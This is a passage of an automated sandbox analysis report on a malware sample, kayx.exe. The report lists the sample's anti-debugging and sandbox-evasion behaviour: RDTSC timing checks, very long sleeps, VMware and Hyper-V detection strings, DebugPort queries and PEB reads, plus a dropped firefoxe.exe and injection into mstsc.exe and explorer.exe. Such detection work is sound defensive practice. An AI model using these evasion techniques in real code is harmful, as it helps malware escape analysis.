Source: C:\Windows\SysWOW64\mstsc.exe RDTSC instruction interceptor: First address: 0000000002F0875E second address: 0000000002F08764 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00408690 rdtsc 17_2_00408690
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\kayx.exe Thread delayed: delay time: 922337203685477
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\kayx.exe TID: 6564 Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\mstsc.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe File opened: C:\Users\user\AppData\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe File opened: C:\Users\user\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: explorer.exe, 00000012.00000000.377242682.000000000F67D000.00000004.00000001.sdmp Binary or memory string: 00000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f563
Source: explorer.exe, 00000012.00000000.373920337.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000012.00000000.373920337.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000012.00000000.366341161.0000000004DF3000.00000004.00000001.sdmp Binary or memory string: _VMware_SATA_CD00#5&}
Source: explorer.exe, 00000012.00000000.373348445.0000000008220000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000012.00000000.373649853.0000000008640000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: firefoxe.exe, 00000014.00000002.485995375.00000000036F1000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000012.00000000.377242682.000000000F67D000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
Source: explorer.exe, 00000012.00000000.367147757.00000000055D0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 00000012.00000000.373920337.000000000871F000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000012.00000000.373920337.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000012.00000000.367196676.0000000005603000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000012.00000000.377242682.000000000F67D000.00000004.00000001.sdmp Binary or memory string: 53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f
Source: explorer.exe, 00000012.00000000.377242682.000000000F67D000.00000004.00000001.sdmp Binary or memory string: d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000012.00000000.373348445.0000000008220000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000012.00000000.373348445.0000000008220000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000012.00000000.373348445.0000000008220000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\kayx.exe Process information queried: ProcessInformation

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Users\user\Desktop\kayx.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\mstsc.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00408690 rdtsc 17_2_00408690
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_004098F0 LdrLoadDll, 17_2_004098F0
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E040E1 mov eax, dword ptr fs:[00000030h] 17_2_00E040E1
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E040E1 mov eax, dword ptr fs:[00000030h] 17_2_00E040E1
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E040E1 mov eax, dword ptr fs:[00000030h] 17_2_00E040E1
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E058EC mov eax, dword ptr fs:[00000030h] 17_2_00E058EC
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E9B8D0 mov eax, dword ptr fs:[00000030h] 17_2_00E9B8D0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E9B8D0 mov ecx, dword ptr fs:[00000030h] 17_2_00E9B8D0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E9B8D0 mov eax, dword ptr fs:[00000030h] 17_2_00E9B8D0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E9B8D0 mov eax, dword ptr fs:[00000030h] 17_2_00E9B8D0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E9B8D0 mov eax, dword ptr fs:[00000030h] 17_2_00E9B8D0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E9B8D0 mov eax, dword ptr fs:[00000030h] 17_2_00E9B8D0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E320A0 mov eax, dword ptr fs:[00000030h] 17_2_00E320A0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E320A0 mov eax, dword ptr fs:[00000030h] 17_2_00E320A0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E320A0 mov eax, dword ptr fs:[00000030h] 17_2_00E320A0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E320A0 mov eax, dword ptr fs:[00000030h] 17_2_00E320A0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E320A0 mov eax, dword ptr fs:[00000030h] 17_2_00E320A0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E320A0 mov eax, dword ptr fs:[00000030h] 17_2_00E320A0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E490AF mov eax, dword ptr fs:[00000030h] 17_2_00E490AF
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3F0BF mov ecx, dword ptr fs:[00000030h] 17_2_00E3F0BF
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3F0BF mov eax, dword ptr fs:[00000030h] 17_2_00E3F0BF
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3F0BF mov eax, dword ptr fs:[00000030h] 17_2_00E3F0BF
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E09080 mov eax, dword ptr fs:[00000030h] 17_2_00E09080
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E83884 mov eax, dword ptr fs:[00000030h] 17_2_00E83884
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E83884 mov eax, dword ptr fs:[00000030h] 17_2_00E83884
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED1074 mov eax, dword ptr fs:[00000030h] 17_2_00ED1074
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC2073 mov eax, dword ptr fs:[00000030h] 17_2_00EC2073
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E20050 mov eax, dword ptr fs:[00000030h] 17_2_00E20050
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E20050 mov eax, dword ptr fs:[00000030h] 17_2_00E20050
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E1B02A mov eax, dword ptr fs:[00000030h] 17_2_00E1B02A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E1B02A mov eax, dword ptr fs:[00000030h] 17_2_00E1B02A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E1B02A mov eax, dword ptr fs:[00000030h] 17_2_00E1B02A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E1B02A mov eax, dword ptr fs:[00000030h] 17_2_00E1B02A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3002D mov eax, dword ptr fs:[00000030h] 17_2_00E3002D
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3002D mov eax, dword ptr fs:[00000030h] 17_2_00E3002D
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3002D mov eax, dword ptr fs:[00000030h] 17_2_00E3002D
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3002D mov eax, dword ptr fs:[00000030h] 17_2_00E3002D
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3002D mov eax, dword ptr fs:[00000030h] 17_2_00E3002D
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2A830 mov eax, dword ptr fs:[00000030h] 17_2_00E2A830
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2A830 mov eax, dword ptr fs:[00000030h] 17_2_00E2A830
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2A830 mov eax, dword ptr fs:[00000030h] 17_2_00E2A830
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2A830 mov eax, dword ptr fs:[00000030h] 17_2_00E2A830
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED4015 mov eax, dword ptr fs:[00000030h] 17_2_00ED4015
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED4015 mov eax, dword ptr fs:[00000030h] 17_2_00ED4015
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E87016 mov eax, dword ptr fs:[00000030h] 17_2_00E87016
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E87016 mov eax, dword ptr fs:[00000030h] 17_2_00E87016
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E87016 mov eax, dword ptr fs:[00000030h] 17_2_00E87016
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E0B1E1 mov eax, dword ptr fs:[00000030h] 17_2_00E0B1E1
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E0B1E1 mov eax, dword ptr fs:[00000030h] 17_2_00E0B1E1
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E0B1E1 mov eax, dword ptr fs:[00000030h] 17_2_00E0B1E1
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E941E8 mov eax, dword ptr fs:[00000030h] 17_2_00E941E8
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E361A0 mov eax, dword ptr fs:[00000030h] 17_2_00E361A0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E361A0 mov eax, dword ptr fs:[00000030h] 17_2_00E361A0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC49A4 mov eax, dword ptr fs:[00000030h] 17_2_00EC49A4
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC49A4 mov eax, dword ptr fs:[00000030h] 17_2_00EC49A4
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC49A4 mov eax, dword ptr fs:[00000030h] 17_2_00EC49A4
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC49A4 mov eax, dword ptr fs:[00000030h] 17_2_00EC49A4
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E869A6 mov eax, dword ptr fs:[00000030h] 17_2_00E869A6
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E851BE mov eax, dword ptr fs:[00000030h] 17_2_00E851BE
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E851BE mov eax, dword ptr fs:[00000030h] 17_2_00E851BE
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E851BE mov eax, dword ptr fs:[00000030h] 17_2_00E851BE
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E851BE mov eax, dword ptr fs:[00000030h] 17_2_00E851BE
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2C182 mov eax, dword ptr fs:[00000030h] 17_2_00E2C182
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3A185 mov eax, dword ptr fs:[00000030h] 17_2_00E3A185
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E32990 mov eax, dword ptr fs:[00000030h] 17_2_00E32990
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E0C962 mov eax, dword ptr fs:[00000030h] 17_2_00E0C962
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E0B171 mov eax, dword ptr fs:[00000030h] 17_2_00E0B171
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E0B171 mov eax, dword ptr fs:[00000030h] 17_2_00E0B171
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2B944 mov eax, dword ptr fs:[00000030h] 17_2_00E2B944
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2B944 mov eax, dword ptr fs:[00000030h] 17_2_00E2B944
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E24120 mov eax, dword ptr fs:[00000030h] 17_2_00E24120
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E24120 mov eax, dword ptr fs:[00000030h] 17_2_00E24120
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E24120 mov eax, dword ptr fs:[00000030h] 17_2_00E24120
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E24120 mov eax, dword ptr fs:[00000030h] 17_2_00E24120
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E24120 mov ecx, dword ptr fs:[00000030h] 17_2_00E24120
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3513A mov eax, dword ptr fs:[00000030h] 17_2_00E3513A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3513A mov eax, dword ptr fs:[00000030h] 17_2_00E3513A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E09100 mov eax, dword ptr fs:[00000030h] 17_2_00E09100
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E09100 mov eax, dword ptr fs:[00000030h] 17_2_00E09100
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E09100 mov eax, dword ptr fs:[00000030h] 17_2_00E09100
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E32AE4 mov eax, dword ptr fs:[00000030h] 17_2_00E32AE4
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E32ACB mov eax, dword ptr fs:[00000030h] 17_2_00E32ACB
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E052A5 mov eax, dword ptr fs:[00000030h] 17_2_00E052A5
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E052A5 mov eax, dword ptr fs:[00000030h] 17_2_00E052A5
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E052A5 mov eax, dword ptr fs:[00000030h] 17_2_00E052A5
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E052A5 mov eax, dword ptr fs:[00000030h] 17_2_00E052A5
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E052A5 mov eax, dword ptr fs:[00000030h] 17_2_00E052A5
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E1AAB0 mov eax, dword ptr fs:[00000030h] 17_2_00E1AAB0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E1AAB0 mov eax, dword ptr fs:[00000030h] 17_2_00E1AAB0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3FAB0 mov eax, dword ptr fs:[00000030h] 17_2_00E3FAB0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3D294 mov eax, dword ptr fs:[00000030h] 17_2_00E3D294
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3D294 mov eax, dword ptr fs:[00000030h] 17_2_00E3D294
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EBB260 mov eax, dword ptr fs:[00000030h] 17_2_00EBB260
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EBB260 mov eax, dword ptr fs:[00000030h] 17_2_00EBB260
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED8A62 mov eax, dword ptr fs:[00000030h] 17_2_00ED8A62
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E4927A mov eax, dword ptr fs:[00000030h] 17_2_00E4927A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E09240 mov eax, dword ptr fs:[00000030h] 17_2_00E09240
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E09240 mov eax, dword ptr fs:[00000030h] 17_2_00E09240
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E09240 mov eax, dword ptr fs:[00000030h] 17_2_00E09240
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E09240 mov eax, dword ptr fs:[00000030h] 17_2_00E09240
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ECEA55 mov eax, dword ptr fs:[00000030h] 17_2_00ECEA55
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E94257 mov eax, dword ptr fs:[00000030h] 17_2_00E94257
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E44A2C mov eax, dword ptr fs:[00000030h] 17_2_00E44A2C
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E44A2C mov eax, dword ptr fs:[00000030h] 17_2_00E44A2C
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h] 17_2_00E2A229
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h] 17_2_00E2A229
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h] 17_2_00E2A229
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h] 17_2_00E2A229
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h] 17_2_00E2A229
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h] 17_2_00E2A229
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h] 17_2_00E2A229
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h] 17_2_00E2A229
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2A229 mov eax, dword ptr fs:[00000030h] 17_2_00E2A229
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E18A0A mov eax, dword ptr fs:[00000030h] 17_2_00E18A0A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E05210 mov eax, dword ptr fs:[00000030h] 17_2_00E05210
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E05210 mov ecx, dword ptr fs:[00000030h] 17_2_00E05210
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E05210 mov eax, dword ptr fs:[00000030h] 17_2_00E05210
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E05210 mov eax, dword ptr fs:[00000030h] 17_2_00E05210
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E0AA16 mov eax, dword ptr fs:[00000030h] 17_2_00E0AA16
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E0AA16 mov eax, dword ptr fs:[00000030h] 17_2_00E0AA16
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ECAA16 mov eax, dword ptr fs:[00000030h] 17_2_00ECAA16
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ECAA16 mov eax, dword ptr fs:[00000030h] 17_2_00ECAA16
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E23A1C mov eax, dword ptr fs:[00000030h] 17_2_00E23A1C
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E303E2 mov eax, dword ptr fs:[00000030h] 17_2_00E303E2
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E303E2 mov eax, dword ptr fs:[00000030h] 17_2_00E303E2
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E303E2 mov eax, dword ptr fs:[00000030h] 17_2_00E303E2
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E303E2 mov eax, dword ptr fs:[00000030h] 17_2_00E303E2
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E303E2 mov eax, dword ptr fs:[00000030h] 17_2_00E303E2
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E303E2 mov eax, dword ptr fs:[00000030h] 17_2_00E303E2
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2DBE9 mov eax, dword ptr fs:[00000030h] 17_2_00E2DBE9
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E853CA mov eax, dword ptr fs:[00000030h] 17_2_00E853CA
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E853CA mov eax, dword ptr fs:[00000030h] 17_2_00E853CA
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED5BA5 mov eax, dword ptr fs:[00000030h] 17_2_00ED5BA5
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E34BAD mov eax, dword ptr fs:[00000030h] 17_2_00E34BAD
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E34BAD mov eax, dword ptr fs:[00000030h] 17_2_00E34BAD
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E34BAD mov eax, dword ptr fs:[00000030h] 17_2_00E34BAD
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC138A mov eax, dword ptr fs:[00000030h] 17_2_00EC138A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EBD380 mov ecx, dword ptr fs:[00000030h] 17_2_00EBD380
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E11B8F mov eax, dword ptr fs:[00000030h] 17_2_00E11B8F
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E11B8F mov eax, dword ptr fs:[00000030h] 17_2_00E11B8F
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3B390 mov eax, dword ptr fs:[00000030h] 17_2_00E3B390
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E32397 mov eax, dword ptr fs:[00000030h] 17_2_00E32397
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E0DB60 mov ecx, dword ptr fs:[00000030h] 17_2_00E0DB60
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E33B7A mov eax, dword ptr fs:[00000030h] 17_2_00E33B7A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E33B7A mov eax, dword ptr fs:[00000030h] 17_2_00E33B7A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E0DB40 mov eax, dword ptr fs:[00000030h] 17_2_00E0DB40
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED8B58 mov eax, dword ptr fs:[00000030h] 17_2_00ED8B58
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E0F358 mov eax, dword ptr fs:[00000030h] 17_2_00E0F358
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC131B mov eax, dword ptr fs:[00000030h] 17_2_00EC131B
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC14FB mov eax, dword ptr fs:[00000030h] 17_2_00EC14FB
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E86CF0 mov eax, dword ptr fs:[00000030h] 17_2_00E86CF0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E86CF0 mov eax, dword ptr fs:[00000030h] 17_2_00E86CF0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E86CF0 mov eax, dword ptr fs:[00000030h] 17_2_00E86CF0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED8CD6 mov eax, dword ptr fs:[00000030h] 17_2_00ED8CD6
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E1849B mov eax, dword ptr fs:[00000030h] 17_2_00E1849B
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2746D mov eax, dword ptr fs:[00000030h] 17_2_00E2746D
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3A44B mov eax, dword ptr fs:[00000030h] 17_2_00E3A44B
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E9C450 mov eax, dword ptr fs:[00000030h] 17_2_00E9C450
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E9C450 mov eax, dword ptr fs:[00000030h] 17_2_00E9C450
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3BC2C mov eax, dword ptr fs:[00000030h] 17_2_00E3BC2C
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED740D mov eax, dword ptr fs:[00000030h] 17_2_00ED740D
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED740D mov eax, dword ptr fs:[00000030h] 17_2_00ED740D
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED740D mov eax, dword ptr fs:[00000030h] 17_2_00ED740D
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E86C0A mov eax, dword ptr fs:[00000030h] 17_2_00E86C0A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E86C0A mov eax, dword ptr fs:[00000030h] 17_2_00E86C0A
